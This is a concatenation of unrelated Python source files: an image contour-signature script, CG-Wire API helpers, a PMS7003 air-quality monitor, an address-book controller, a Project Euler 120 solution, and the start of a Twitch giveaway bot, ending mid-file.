            self.target.write_value(self.buffer_size_file, attempt_buffer_size, verify=False)
            buffer_size = self.target.read_int(self.buffer_size_file)
            if attempt_buffer_size != buffer_size:
                message = 'Failed to set trace buffer size to {}, value set was {}'
                self.logger.warning(message.format(target_buffer_size, buffer_size))
                break
def _build_trace_events(events):
event_string = ' '.join(['-e {}'.format(e) for e in events])
return event_string
|
<filename>submodules/ImageTools/SignatureInfo.py
import cv2
import numpy as np
import matplotlib.pyplot as plt
def get_contours_binary(img):
    """Threshold a BGR image and return the contours of its dark regions.

    Args:
        img: BGR image as loaded by cv2.imread.

    Returns:
        The contour list from cv2.findContours (RETR_TREE, CHAIN_APPROX_NONE).
    """
    imgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
    ret, thresh = cv2.threshold(imgray, 127, 255, 0)
    # Invert so dark shapes on a light background become foreground.
    thresh_white = 255 - thresh
    # NOTE: with OpenCV < 4.0 findContours returns (image, contours, hierarchy);
    # this 3-tuple unpacking assumes that older API.
    _, contours, hierarchy = cv2.findContours(thresh_white, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)
    return contours
def mark_center(contours, img=None, isShow=False):
    """Compute contour centroids and return the centroid of the LAST contour.

    Args:
        contours: contour list as returned by cv2.findContours.
        img: image to draw the centroid marker on when isShow is True.
        isShow: if True, draw and display each centroid with cv2.imshow.

    Returns:
        (cX, cY): integer centroid coordinates of the last contour processed.

    Raises:
        ValueError: if *contours* is empty (previously this crashed with an
            unbound-local NameError on the return statement).
    """
    if len(contours) == 0:
        raise ValueError("mark_center() requires at least one contour")
    for i in contours:
        # calculate moments for each contour
        M = cv2.moments(i)
        # Guard against zero-area contours to avoid division by zero.
        if M["m00"] == 0:
            M["m00"] = 1
        # calculate x,y coordinate of center
        cX = int(M["m10"] / M["m00"])
        cY = int(M["m01"] / M["m00"])
        if isShow is True:
            img_center = cv2.circle(img, (cX, cY), 3, (20, 255, 0), -1)
            cv2.imshow("img_center", img_center)
            cv2.waitKey(0)
    # NOTE(review): only the last contour's centroid survives the loop --
    # presumably callers pass a single-contour list; confirm intent.
    return (cX, cY)
def get_signature_info(contours, center, isShow=False):
    """Build the shape signature of the first contour: a mapping of angle
    (degrees, measured from a reference ray, 0-360) to distance from center.

    Args:
        contours: contour list from cv2.findContours; only contours[0] is
            used.  # assumes np.array(contours)[0] has shape (N, 1, 2) -- TODO confirm
        center: (cX, cY) point the distances are measured from.
        isShow: if True, plot the signature curve with matplotlib.

    Returns:
        dict: {theta_degrees: distance}, ordered by ascending angle.
    """
    cX, cY = center
    contours = np.array(contours)
    points = contours[0, :, 0, :]
    # print(points)
    # Find the first contour point lying on the horizontal ray to the right
    # of the centre; angles are measured relative to that point.
    start_point = 0
    for i in range(points.shape[0]):
        pX = points[i, 0]
        pY = points[i, 1]
        if cY == pY:
            if cX < pX:
                print(pX, pY)
                print("start")
                start_point = i
                break
    center_dist_infos = {}
    # Reference vector from the centre to the start point (along +x).
    vecter_0 = np.array([points[start_point, 0] - cX, 0])
    for i in range(points.shape[0]):
        pX = points[i, 0]
        pY = points[i, 1]
        center_dist = (abs(cX - pX) ** 2 + abs(cY - pY) ** 2) ** (1 / 2)
        vecter_a = np.array([points[i, 0] - cX, cY - points[i, 1]])
        # theta = np.degrees(np.arccos((vecter_0 - vecter_a) / vecter_0[0] * center_dist))  # wrong???
        # Angle between the reference vector and this point's vector.
        # NOTE(review): divides by vecter_0[0] * center_dist -- a point that
        # coincides with the centre would divide by zero; confirm inputs.
        theta = np.degrees(np.arccos(np.dot(vecter_0, vecter_a) / (vecter_0[0] * center_dist)))
        if pY > cY:
            # arccos only covers 0-180 degrees; mirror points below the centre.
            theta = 360 - theta
        center_dist_infos.update({theta: center_dist})
    # Rebuild the dict in ascending-angle order (insertion order preserved).
    center_dist_infos_ls = sorted(center_dist_infos.items(), key=lambda x: x[0])
    center_dist_infos = {}
    for item in center_dist_infos_ls:
        center_dist_infos.update({item[0]: item[1]})
    if isShow is True:
        plt.clf()
        plt.xlim([0, 360])
        plt.ylim([0, max(center_dist_infos.values()) + 20])
        a = list(center_dist_infos.keys())
        b = list(center_dist_infos.values())
        plt.plot(a, b)
        plt.show()
    return center_dist_infos
if __name__ == "__main__":
    # Demo: for each sample image show the original, its contours, and its
    # shape signature in a 3x3 grid (one column per image).
    paths = ['images/square.jpg', 'images/pantagon.jpg', 'images/star.bmp']
    i = 0
    for path in paths:
        img = cv2.imread(path)
        contours = get_contours_binary(img)
        img_contours = cv2.drawContours(img.copy(), contours, -1, (0, 255, 0), 3)
        center = mark_center(contours)
        # cv2.circle draws onto img_contours in place; the returned array is
        # the same object, so the previous unused binding was dropped.
        cv2.circle(img_contours, center, 3, (20, 255, 0), -1)
        signature_info = get_signature_info(contours, center, isShow=False)
        plt.subplot(3, 3, i + 1)
        plt.imshow(img, cmap='gray', interpolation='bilinear')
        # FIX: "oringal" -> "original" in the panel title.
        plt.title("original {}".format(path[7:-4])), plt.xticks([]), plt.yticks([])
        plt.subplot(3, 3, i + 1 + 3)
        plt.imshow(img_contours, cmap='gray', interpolation='bilinear')
        plt.title("contours {}".format(path[7:-4])), plt.xticks([]), plt.yticks([])
        plt.subplot(3, 3, i + 1 + 3 + 3)
        plt.title("signature {}".format(path[7:-4])), plt.xticks([]), plt.yticks([])
        plt.xlim([0, 360])
        y_min = min(signature_info.values())
        y_max = max(signature_info.values())
        plt.ylim([y_min - 10, y_max + 10])
        a = list(signature_info.keys())
        b = list(signature_info.values())
        plt.plot(a, b)
        # FIX: 270 degrees is 3*pi/2 (was mislabelled "2 pi/3"); labels now
        # keep the whole expression inside math mode.
        plt.xticks([0, 90, 180, 270, 360],
                   [r'$0$', r'$\pi/2$', r'$\pi$', r'$3\pi/2$', r'$2\pi$'])
        plt.yticks([y_min - 10, y_min + (y_max - y_min) / 2, y_max + 10])
        i += 1
    plt.show()
|
import sys
import logging
import requests.exceptions
import gazu
from Qt import QtCore
log = logging.getLogger(__name__)
def get_cgwire_data(data):
    """Fetch the full record for an entity from CG-Wire.

    Args:
        data (dict): Dictionary containing "type" and "id" of the query.

    Returns:
        dict: The result from Gazu.
    """
    assert "type" in data
    assert "id" in data

    entity_type = data["type"].lower()
    # Resolve e.g. gazu.project.get_project, gazu.asset.get_asset, ...
    module = getattr(gazu, entity_type)
    getter = getattr(module, "get_{0}".format(entity_type))
    return getter(data["id"])
def get_web_url(entity=None):
    """Get the web url for the given entity

    Note: This might not work with all entity types!
    """
    # todo: continue implementation (only tested with "tasks" for now)
    conversion = {
        "TaskType": "task-types",
        "Project": "productions",
        "Person": "people",
        "Asset": "assets",
        "Shot": "shots",
        "Task": "tasks"
    }

    def _format_url(entity):
        """Format the URL element for an entity"""
        return "/{type}/{id}".format(type=conversion[entity["type"]],
                                     id=entity["id"])

    # Base URL is the host with its trailing '/api' stripped.
    base = gazu.client.get_host()[:-4]

    # When no entity is given just go to the base CG-Wire page.
    if entity is None:
        return base

    # Ensure we get the "full" entity with parent data
    entity = get_cgwire_data(entity)

    entity_type = entity["type"]
    if entity_type == "Task":
        # /productions/{project-id}/{for_entity}/tasks/{task_id}
        # parent: 'assets' or 'shots'
        parent = conversion[entity["task_type"]["for_entity"]]
        return "".join([base,
                        _format_url(entity["project"]),
                        "/", parent,
                        _format_url(entity)])
    if entity_type in ("Asset", "Shot"):
        # For assets and shots it must be prefixed with project
        return base + _format_url(entity["project"]) + _format_url(entity)
    return base + _format_url(entity)
def is_valid_api_url(url):
    """Return whether the API url is valid for zou/gazu.

    This checks the JSON response from the `host/api` url to see whether it
    contains the api == Zou value.

    Args:
        url (str): URL to probe.

    Returns:
        bool: Whether the url is the /api url for CG-Wire's zou.
    """
    # Just use the gazu client's request session
    session = gazu.client.requests_session
    result = session.get(url)
    if result.status_code != 200:
        # The status is not as expected from a valid CG-Wire zou
        # api url. So we consider this to be an invalid response.
        return False

    try:
        data = result.json()
    except ValueError:
        # Body is not JSON, so it cannot be a zou /api endpoint.
        # (Previously the exception was bound to an unused `exc` name.)
        return False

    return "api" in data and "version" in data and data["api"] == "Zou"
def is_logged_in():
    """Return whether you are currently logged in with Gazu"""
    try:
        return bool(gazu.client.get_current_user())
    except (gazu.exception.NotAuthenticatedException,
            requests.exceptions.ConnectionError):
        # Not authenticated (or no connection): treat as not logged in.
        return False
def log_out():
    """Log out from Gazu by clearing its access tokens."""
    gazu.client.tokens = {
        "access_token": "",
        "refresh_token": ""
    }
class Worker(QtCore.QThread):
    """Perform work in a background thread."""
    def __init__(self, function, args=None, kwargs=None, parent=None):
        """Execute *function* in separate thread.

        It stores the threaded function call's result in `self.result`.
        When an exception occurs the error is stored in `self.error`
        as a `sys.exc_info()` triple.

        Args:
            function (function): The function that will be threaded.
            args (tuple or list): positional arguments
            kwargs (dict): keyword arguments to pass to the function
                on execution.
            parent (QtCore.QObject): The parent Qt object.

        Example usage:
            try:
                worker = Worker(fn, args=[42])
                worker.start()
                while worker.isRunning():
                    app = QtGui.QApplication.instance()
                    app.processEvents()
                if worker.error:
                    raise worker.error[1], None, worker.error[2]
            except Exception as error:
                traceback.print_exc()
        """
        super(Worker, self).__init__(parent=parent)
        self.function = function
        # NOTE: `or` replaces any falsy value (e.g. an empty tuple) with the
        # default, not just None -- harmless here since empty args/kwargs
        # behave the same as the defaults.
        self.args = args or []
        self.kwargs = kwargs or {}
        self.result = None   # return value of `function`, set after run()
        self.error = None    # sys.exc_info() triple when `function` raised

    def run(self):
        """Execute function and store result."""
        try:
            self.result = self.function(*self.args, **self.kwargs)
        except Exception:
            # Store the full exc_info so the caller thread can re-raise.
            self.error = sys.exc_info()
|
#!/usr/bin/env python
import click
from colorama import Fore, Style
import logging
import os
import systemd_watchdog
from typing import Tuple, Optional, List
from influxdb_logger import InfluxdbLogger
from pms7003 import PMS7003, PMSData, SearchResult
def get_aqi(pm25: float) -> int:
    """Compute the US EPA AQI for a PM2.5 concentration.

    https://en.wikipedia.org/wiki/Air_quality_index#Computing_the_AQI

    Args:
        pm25: PM2.5 concentration in ug/m3 (assumed non-negative).

    Returns:
        The AQI rounded to the nearest integer.  (The previous annotation
        claimed ``str``, but ``round()`` returns an int.)
    """
    # Table for computing AQI from PM2.5, ug/m3
    # c_low, c_high, i_low, i_high
    breakpoint_table = [
        [  0,    12.0,   0,  50],
        [ 12.1,  35.4,  51, 100],
        [ 35.5,  55.4, 101, 150],
        [ 55.5, 150.4, 151, 200],
        [150.5, 250.4, 201, 300],
        [250.5, 350.4, 301, 400],
        [350.5, 500.4, 401, 500],
    ]
    # FIX: fall back to the top band for off-scale readings (> 500.4) and
    # extrapolate, instead of letting next() raise StopIteration.
    category_row = next(
        (row for row in breakpoint_table if pm25 <= row[1]),
        breakpoint_table[-1],
    )
    c_low, c_high, i_low, i_high = category_row
    aqi = (i_high - i_low) / (c_high - c_low) * (pm25 - c_low) + i_low
    return round(aqi)
def get_aqi_level(aqi: float) -> Tuple[str, str]:
    """Return the (category name, colorama style) for an AQI value.

    Bands follow the EPA definition: 0-50 Good, 51-100 Moderate, 101-150
    Unhealthy for Certain Groups, 151-200 Unhealthy, 201-300 Very Unhealthy,
    301+ Hazardous.

    FIX: the comparisons previously used ``<`` so the exact upper bound of
    each band was misclassified one category too high (e.g. AQI 50 showed
    as "Moderate" instead of "Good").
    """
    if aqi <= 50:
        return "Good", Fore.GREEN
    elif aqi <= 100:
        return "Moderate", Fore.YELLOW
    elif aqi <= 150:
        return "Unhealthy for Certain Groups", f"{Fore.YELLOW}{Style.BRIGHT}"
    elif aqi <= 200:
        return "Unhealthy", Fore.RED
    elif aqi <= 300:
        return "Very Unhealthy", f"{Fore.RED}{Style.BRIGHT}"
    else:
        return "Hazardous", Fore.MAGENTA
def print_debug(data: PMSData) -> None:
    """Dump every field of a PMSData frame to stdout for inspection."""
    divider = (
        "============================================================================"
    )
    print(divider)
    print(
        "Header : %c %c \t\t | Frame length : %s"
        % (data.header_high, data.header_low, data.frame_length)
    )
    print("PM 1.0 (CF=1) : %s\t | PM 1.0 : %s" % (data.pm1_0_cf1, data.pm1_0_atm))
    print("PM 2.5 (CF=1) : %s\t | PM 2.5 : %s" % (data.pm2_5_cf1, data.pm2_5_atm))
    print("PM 10.0 (CF=1) : %s\t | PM 10.0 : %s" % (data.pm10_0_cf1, data.pm10_0_atm))
    # Particle counts per 0.1 L of air, one line per size bucket.
    for size, count in (
        ("0.3", data.count_0_3),
        ("0.5", data.count_0_5),
        ("1.0", data.count_1_0),
        ("2.5", data.count_2_5),
        ("5.0", data.count_5_0),
        ("10.0", data.count_10_0),
    ):
        print("%sum in 0.1L of air : %s" % (size, count))
    print("Reserved F : %s" % data.reserved)
    print("CHKSUM : %s" % data.checksum)
    print(divider)
def print_pm(data: PMSData) -> None:
    """Print the atmospheric PM readings and colorized AQI on a single line."""
    aqi = get_aqi(data.pm2_5_atm)
    level, style = get_aqi_level(aqi)
    parts = [
        f"PM 1.0: {data.pm1_0_atm}",
        f"PM 2.5: {style}{data.pm2_5_atm}{Style.RESET_ALL}",
        f"PM 10: {data.pm10_0_atm}",
        f"AQI: {style}{aqi} ({level}){Style.RESET_ALL}",
    ]
    click.echo(" ".join(parts))
def configure_logging(debug: bool) -> None:
    """Attach a stream handler to the app logger and set its verbosity."""
    app_logger = logging.getLogger("mini-aqm")
    app_logger.addHandler(logging.StreamHandler())
    level = logging.DEBUG if debug else logging.ERROR
    app_logger.setLevel(level)
    app_logger.debug("configured debug logging")
@click.command()
@click.option(
    "--port",
    default=None,
    help="Location of PMS7003 TTY device",
    show_default="scans possible ports for devices",
)
@click.option(
    "--debug/--no-debug",
    default=False,
    help="Print debug data from the device",
    show_default=True,
)
@click.option(
    "--log-only/--no-log-only",
    default=False,
    help="Only log to the influxdb log file; nothing on stdout",
)
@click.option(
    "--log-path",
    default="measurements.log",
    help="Location where logs are written",
    show_default=True,
)
def main(port: Optional[str], debug: bool, log_only: bool, log_path: str) -> None:
    """Locate PMS7003 sensors, then loop forever reading and logging them.

    Exits early (after printing to stderr) when no serial device or no
    working PMS7003 is found.  Pings the systemd watchdog on every pass so
    the process can run as a supervised service.
    """
    configure_logging(debug)
    log = logging.getLogger("mini-aqm.main")
    log.debug("looking for possible PMS7003 devices...")
    possible: List[SearchResult] = PMS7003.find_devices(only=port)
    # NOTE(review): any() relies on SearchResult truthiness here -- presumably
    # find_devices returns an empty list when nothing is found; confirm.
    if not any(possible):
        click.echo(
            f"{Fore.RED}"
            f"no serial devices found. is your device plugged in? did you install drivers?"
            f"{Style.RESET_ALL}",
            err=True,
        )
        return
    # Report ports that were found but could not be opened as a PMS7003.
    for p in possible:
        if p.dev is None:
            click.echo(
                f"{Fore.YELLOW}"
                f"error on {p.desc} {p.port}: {p.error}"
                f"{Style.RESET_ALL}",
                err=True,
            )
    devs = [p.dev for p in possible if p.dev]
    if not any(devs):
        click.echo(
            f"{Fore.RED}"
            f"no PMS7003 devices found; resolve any errors printed above and try again"
            f"{Style.RESET_ALL}",
            err=True,
        )
        return
    logger = InfluxdbLogger(log_path)
    click.echo(
        f"{Fore.BLUE}"
        f"writing influxdb measurement {logger.MEASUREMENT} to {logger.path}"
        f"{Style.RESET_ALL}"
    )
    for dev in devs:
        click.echo(
            f"{Fore.GREEN}beginning to read data from {dev.id}...{Style.RESET_ALL}"
        )
    # systemd watchdog, in case this is running as a systemd service
    wd = systemd_watchdog.watchdog()
    wd.ready()
    # Main read loop: one frame per device per pass, forever.
    while True:
        wd.ping()
        for dev in devs:
            data = dev.read()
            if debug:
                # Debug mode dumps the raw frame instead of logging it.
                print_debug(data)
            else:
                # Persist only the pm* fields of the frame to influxdb.
                logger.emit(
                    fields={
                        k: v for k, v in data._asdict().items() if k.startswith("pm")
                    },
                    tags={"type": "PMS7003", "id": dev.id},
                )
                if not log_only:
                    print_pm(data)
if __name__ == "__main__":
    # Script entry point; click parses the CLI options.
    main()
|
<reponame>haigdouzdjian/BeetBook
from entry import Entry
from addressBook import AddressBook
from utils import *
class App:
    """Top-level controller managing a set of open AddressBook objects.

    Each open book lives in ``open_address_books`` keyed by an integer id,
    as ``{'initialHash': <hash at open/save time>, 'object': <AddressBook>}``.
    The stored hash is compared with the current hash to detect unsaved
    changes when closing a book.
    """

    def __init__(self):
        self.open_address_books = {}   # book_id -> {'initialHash': int, 'object': AddressBook}
        self.address_book_count = 0    # next id to assign (monotonically increasing)
        self.default_fields = []
        self.filename = ''

    def check_address_book_id(self, book_id):
        """Return True if book_id refers to a currently open address book."""
        return book_id in self.open_address_books

    def check_entry_id(self, book_id, entry_id):
        """Return whether entry_id exists in the given open book."""
        return self.open_address_books.get(book_id).get('object').check_entry_id(entry_id)

    def get_default_fields(self):
        """Return the field names of a blank Entry."""
        return list(Entry().get_values())

    def create_address_book(self, address_book_name):
        """Create a new blank address book and return its id."""
        new_ad = AddressBook(address_book_name)
        book_id = self.address_book_count
        self.open_address_books[book_id] = {
            'initialHash': hash(new_ad),   # snapshot for dirty-checking
            'object': new_ad,
        }
        new_ad.set_meta('address_book_id', book_id)
        self.address_book_count += 1
        log(self.open_address_books)
        return book_id

    def open_address_book(self, filename=''):
        """Open an address book from a JSON file.

        Returns the new book's id, or -1 if the import was not successful.
        """
        new_ad = AddressBook()
        valid = new_ad.import_json(filename, self.address_book_count)
        if not valid:
            return -1
        book_id = self.address_book_count
        # Hash is snapshotted before set_meta, matching create_address_book.
        self.open_address_books[book_id] = {
            'initialHash': hash(new_ad),
            'object': new_ad,
        }
        # BUG FIX: the original called set_meta twice with identical
        # arguments; once is sufficient.
        new_ad.set_meta('address_book_id', book_id)
        self.address_book_count += 1
        return book_id

    def close_address_book(self, address_book_id=-1, force=False):
        """Close an open address book.

        Returns True when the book was not open, and False (book stays
        open) when it has unsaved changes and force is False.  A
        successful close returns None, kept for backward compatibility.
        """
        if not self.check_address_book_id(address_book_id):
            return True
        if not force:
            book = self.open_address_books[address_book_id]
            # Unsaved changes are detected by comparing the stored hash
            # against the object's current hash.
            if book['initialHash'] != hash(book['object']):
                return False
        del self.open_address_books[address_book_id]

    def save_address_book(self, address_book_id=-1, filename=''):
        """Save a book to disk.

        Returns 0 on success, 1 when no filename is known, 2 when the
        underlying save failed.
        """
        book = self.open_address_books.get(address_book_id).get('object')
        if filename != '':
            book.set_file_name(filename)
        elif book.get_file_name() == '':
            return 1
        if book.save():
            # Re-snapshot the hash so the book is considered clean again.
            self.open_address_books.get(address_book_id)['initialHash'] = hash(book)
            return 0
        return 2

    def create_entry(self, address_book_id=-1, entry_data=None):
        """Add a new entry built from entry_data; returns the add result or False."""
        if not self.check_address_book_id(address_book_id) or entry_data is None:
            return False
        new_entry = Entry(entry_data)
        new_entry.set_value('address_book_id', address_book_id)
        return self.open_address_books.get(address_book_id).get('object').add_entry(new_entry)

    def delete_entry(self, address_book_id=-1, entry_id=-1):
        """Delete an entry from a book; returns the delete result or False."""
        if not self.check_address_book_id(address_book_id):
            return False
        return self.open_address_books.get(address_book_id).get('object').delete_entry(entry_id)

    def update_entry(self, entry_data=None):
        """Update an existing entry; entry_data must include 'address_book_id'.

        BUG FIX: uses a None sentinel instead of a mutable {} default, and
        checks for empty/None input before reading it (the original crashed
        if entry_data was None).
        """
        if not entry_data:
            return False
        address_book_id = entry_data.get('address_book_id')
        return self.open_address_books.get(address_book_id).get('object').update_entry(entry_data)

    def get_address_book(self, address_book_id=-1):
        """Return the string form of an open book, or False if not open."""
        if not self.check_address_book_id(address_book_id):
            return False
        return str(self.open_address_books.get(address_book_id).get('object'))

    def import_tsv(self, address_book_id=-1, filename=''):
        """Import entries from a .tsv file; returns the result, or -1 on bad input."""
        if '.tsv' in filename and self.check_address_book_id(address_book_id):
            return self.open_address_books.get(address_book_id).get('object').import_tsv(filename, address_book_id)
        return -1

    def export_tsv(self, address_book_id=-1, filename='', entry_ids=None):
        """Export entries to a .tsv file; returns the result, or -1 on bad input."""
        # None sentinel instead of a mutable default list.
        if entry_ids is None:
            entry_ids = []
        if '.tsv' in filename and self.check_address_book_id(address_book_id):
            return self.open_address_books.get(address_book_id).get('object').export_tsv(filename, entry_ids)
        return -1

    def sort_address_book(self, address_book_id=-1, key='last_name', orderBy='asc'):
        """Sort a book by key/order; delegates to the AddressBook."""
        return self.open_address_books.get(address_book_id).get('object').sort(key, orderBy)

    def update_book_name(self, address_book_id=-1, new_book_name=''):
        """Rename an open book; returns False on missing id or empty name."""
        if address_book_id == -1 or new_book_name == '':
            return False
        return self.open_address_books.get(address_book_id).get('object').set_meta('name', new_book_name)

    def get_open_address_books(self):
        """Return the mapping of all currently open address books."""
        return self.open_address_books
|
# Question: https://projecteuler.net/problem=120
# The coefficients of a^(odd) cancel out, so there might be a pattern ...
# n | X_n = (a-1)^n + (a+1)^n | mod a^2
#-----|----------------------------|--------
# 1 | 2a | 2a
# 2 | 2a^2 + 2 | 2
# 3 | 2a^3 + 6a | 6a
# 4 | 2a^4 + 6a^2 + 2 | 2
# 5 | 2a^5 + 20a^3 + 10a | 10a
# 6 | 2a^6 + 30a^4 + 30a^2 + 2 | 2
# 7 | 2a^7 + 42a^5 + 70a^3 + 14a | 14a
# So, if n is even, X^n = 2 (mod a^2)
# if n is odd, X^n = 2na (mod a^2)
# For a given 'a', what is the maximum x such that 2na = x (mod a^2) where n is an arbitrary positive integer?
# We know that 2na is even, so if a is odd, the highest possible value of x is a^2 - 1
# if a is even, the highest possible value of x is a^2 - 2
# If a is even, then there exists k such that a = 2k. pick n = k, we have 2na = 2ka = a^2 = 0 (mod a^2)
# n = k - 1, we have 2na = a^2 - 2a (mod a^2)
# n = k - 2, we have 2na = a^2 - 4a (mod a^2)
# ...
# n = k - k, we have 2na = a^2 - 2ka = a^2 - a^2 = 0 (mod a^2)
# so the modulo group is {0, a^2 - 2ka}
# If a is odd, then there exists k such that a = 2k + 1. Pick n = 2k+1, then 2na = 2(2k+1)a = 2a^2 = 0 (mod a^2)
# ...
# n = k+2, then 2na = 2(k+2)a = (2k+1)a + 3a = a^2 + 3a = 3a = a^2 - a^2 + 3a = a^2 - (2k-2)a (mod a^2)
# n = k+1, then 2na = 2(k+1)a = (2k+1)a + a = a^2 + a = a = a^2 - (2k)a (mod a^2)
# start here -> n = k, then 2na = 2ka = (2k+1)a - a = a^2 - a (mod a^2)
# n = k-1, then 2na = 2(k-1)a = (2k+1)a - 3a = a^2 - 3a (mod a^2)
# n = k-2, then 2na = 2(k-2)a = (2k+1)a - 5a = a^2 - 5a (mod a^2)
# ...
# n = k-k, then 2na = 0 (mod a^2)
# so the modulo group is {0, a^2 - ka}
# So, if 'a' is odd, r_max = max(2, a^2 - a). Since a >= 3, r_max = a^2 - a
# if 'a' is even, r_max = max(2, a^2 - 2a). Since a >= 3, r_max = a^2 - 2a
# So, sum_{3,n}(r_max) = [sum_{1,n}(a^2-a)] - [sum_{3<=a<=n, 'a' even} (a)] - {a=1}(a^2-a) - {a=2}(a^2-a)
# = [sum_{1,n}(a^2-a)] - (2*[sum_{1<=i<=floor(n/2)} (i)] - 2) - {a=1}(a^2-a) - {a=2}(a^2-a)
#                  = 1/6 * n * (n+1) * (2n+1) - 1/2 * n * (n+1) - ((n/2)*(n/2+1) - 2) - 0 - 2
#                  = 1/3 * (n-1) * n * (n+1) - 1/4 * n * (n+2)    (exact only for even n, such as N = 1000; for odd n the even-a sum uses floor(n/2))
def euler120(n=1000):
    """Return the sum of r_max for a in [3, n] (Project Euler 120).

    r_max is the largest remainder of (a-1)^k + (a+1)^k mod a^2 over all
    positive k: a^2 - a for odd a and a^2 - 2a for even a (derived above).
    Unlike the closed form in the final comment above (which silently
    assumes n is even), this uses floor(n/2) and is exact for every n >= 3.
    """
    half = n // 2
    # sum_{1<=a<=n}(a^2 - a) = (n-1)n(n+1)/3; the a=1 and a=2 terms are 0 and 2.
    sum_sq_minus_a = (n - 1) * n * (n + 1) // 3 - 2
    # Sum of the even a with 3 <= a <= n: 4 + 6 + ... = half*(half+1) - 2.
    sum_even = half * (half + 1) - 2
    return sum_sq_minus_a - sum_even


N = 1000
result = euler120(N)
print(result)
|
import os
import csv
import random
import configparser
import logging
import sys
import asyncio
from typing import Set, Any
from twitchio.ext import commands
logger = logging.getLogger('bot')
class IgnoreList:
    """Set of lowercased user names excluded from giveaways.

    Persisted as a space-delimited file with one user name at the start of
    each row.
    """

    _users: Set[str]
    _filename: str

    def __init__(self, filename: str = None):
        self._filename = filename or 'ignorelist.txt'
        self._users = set()

    def load(self):
        """Read the ignore file, creating an empty one if it is missing."""
        logger.info('Loading ignorelist...')
        if not os.path.isfile(self._filename):
            logger.info('Ignorelist not found')
            logger.info('Create empty ignorelist...')
            # Append mode creates the file without truncating an existing one.
            with open(self._filename, 'a') as _file:
                pass
        try:
            with open(self._filename, 'r') as _file:
                rows = csv.reader(_file, delimiter=' ', quotechar='"')
                for user, *_ in rows:
                    if user:
                        self._users.add(user.lower())
        except Exception as e:
            # BUG FIX: the original used print() with a plain (non-f) string,
            # so the literal text "{self.filename}" was printed (and the
            # attribute name was wrong); the error never reached the log.
            logger.error(f'Fail to load "{self._filename}": {e}')
        logger.info(f'{len(self._users)} users ignored')
        logger.debug(f'Ignored users: {self._users}')

    def __contains__(self, user: str):
        """Membership test (`name in ignorelist`); expects lowercased names."""
        return user in self._users
class Scoreboard:
    """Persistent mapping of user name -> accumulated giveaway points.

    Stored as a space-delimited file of "<name> <score>" rows, written in
    descending-score order (ties broken alphabetically) on save.
    """

    _filename: str

    def __init__(self, filename=None):
        self._filename = filename or 'scoreboard.txt'
        self._scoreboard = {}

    def load(self):
        """Load scores from disk; keeps current scores on any failure."""
        logger.info('Loading scoreboard...')
        if not os.path.isfile(self._filename):
            return
        scoreboard = {}
        try:
            with open(self._filename, 'r') as _file:
                rows = csv.reader(_file, delimiter=' ', quotechar='"')
                for row in rows:
                    name, score, *_ = row
                    if name and score is not None:
                        scoreboard[name.lower()] = int(score)
            # Only replace the in-memory scoreboard once parsing succeeded.
            self._scoreboard = scoreboard
        except Exception as e:
            # BUG FIX: the original passed `e` as a %-formatting argument to
            # an f-string with no placeholders, which raised a logging
            # formatting error instead of recording the exception.
            logger.warning(f'Fail to load "{self._filename}": {e}')
        for name, score in scoreboard.items():
            logger.debug(f'Scoreboard: {name} {score}')

    def save(self):
        """Write all scores to disk, highest score first."""
        logger.info(f'Saving scoreboard to "{self._filename}"')
        with open(self._filename, 'w', newline='') as _file:
            _writer = csv.writer(_file, delimiter=' ', quotechar='"', quoting=csv.QUOTE_MINIMAL)
            _writer.writerows(sorted(self._scoreboard.items(), key=lambda x: (-x[1], x[0])))

    def get(self, user: str) -> int:
        """Return the user's score (0 if unknown)."""
        return self._scoreboard.get(user, 0)

    def reset(self, user: str) -> None:
        """Set the user's score back to zero."""
        self._scoreboard[user] = 0

    def bump(self, user: str, points: int) -> None:
        """Add points to the user's score, creating the user if needed."""
        # BUG FIX: the original debug message was truncated ("with ").
        logger.debug(f'Bumping score for user {user} with {points} points')
        if user in self._scoreboard:
            self._scoreboard[user] += points
        else:
            self._scoreboard[user] = points
class Giveaway:
    """State machine for a single giveaway round.

    Users enter while the round is open; once closed, a winner is drawn at
    random, weighted by accumulated scoreboard points.
    """

    scoreboard: Scoreboard
    ignorelist: IgnoreList
    opened: bool
    participants: Set[str]
    sub_luck: int

    def __init__(self, sub_luck: int):
        self.scoreboard = Scoreboard()
        self.ignorelist = IgnoreList()
        self.ignorelist.load()
        self.opened = False
        self.sub_luck = sub_luck
        self.participants = set()
        self._lock = asyncio.Lock()

    def open(self):
        """Start a fresh round: reload scores and clear participants."""
        if self.opened:
            return
        self.scoreboard.load()
        self.opened = True
        self.participants = set()
        logger.info('Giveaway is opened')

    def reopen(self):
        """Resume the current round without resetting participants."""
        if self.opened:
            return
        self.opened = True
        logger.info('Giveaway is re-opened')

    def close(self):
        """Stop accepting entries and persist the scoreboard."""
        if not self.opened:
            return
        self.scoreboard.save()
        self.opened = False
        logger.info('Giveaway is closed')
        logger.debug(f'Participants: {self.participants}')

    def winner(self):
        """Draw a score-weighted winner; None if open or no participants."""
        if self.opened:
            logger.warning("Can't pick a winner: Close giveaway to pick a winner")
            return
        if not self.participants:
            logger.warning("Can't pick a winner: No participants")
            return
        pool = list(self.participants)
        pool_weights = [self.scoreboard.get(name) for name in pool]
        winner_name, *_ = random.choices(pool, pool_weights)
        # The winner's points are consumed and they leave the round.
        self.scoreboard.reset(winner_name)
        self.participants.discard(winner_name)
        self.scoreboard.save()
        return winner_name

    def add(self, name: str, is_subscriber: bool = False) -> None:
        """Enter a user into an open round; subscribers earn sub_luck points."""
        logger.debug(f'Try to add participant {name}')
        if not self.opened or name in self.participants:
            return
        if name in self.ignorelist:
            logger.debug(f'User {name} in ignorelist')
            return
        self.participants.add(name)
        self.scoreboard.bump(name, self.sub_luck if is_subscriber else 1)
class Bot(commands.Bot):
    """Twitch chat bot running score-weighted giveaways.

    Settings come from settings.ini, section [bot]: TMI_TOKEN, BOT_NICK,
    CHANNEL and ADMIN are required; BOT_PREFIX (default '!') and SUB_LUCK
    (default 1) are optional.  Admin-only commands: !open, !reopen, !close,
    !winner, !scoreboard, !ignorelist.  Anyone can use !giveaway and !me.
    """

    SUB_LUCK: int
    ADMIN: str
    BOT_PREFIX: str
    CHANNEL: str
    BOT_NICK: str
    TMI_TOKEN: str

    def __init__(self):
        config = configparser.ConfigParser()
        config.read('settings.ini')
        self.TMI_TOKEN = config['bot']['TMI_TOKEN']
        self.BOT_NICK = config['bot']['BOT_NICK']
        self.CHANNEL = config['bot']['CHANNEL']
        self.BOT_PREFIX = config['bot'].get('BOT_PREFIX', '!')
        self.ADMIN = config['bot']['ADMIN']
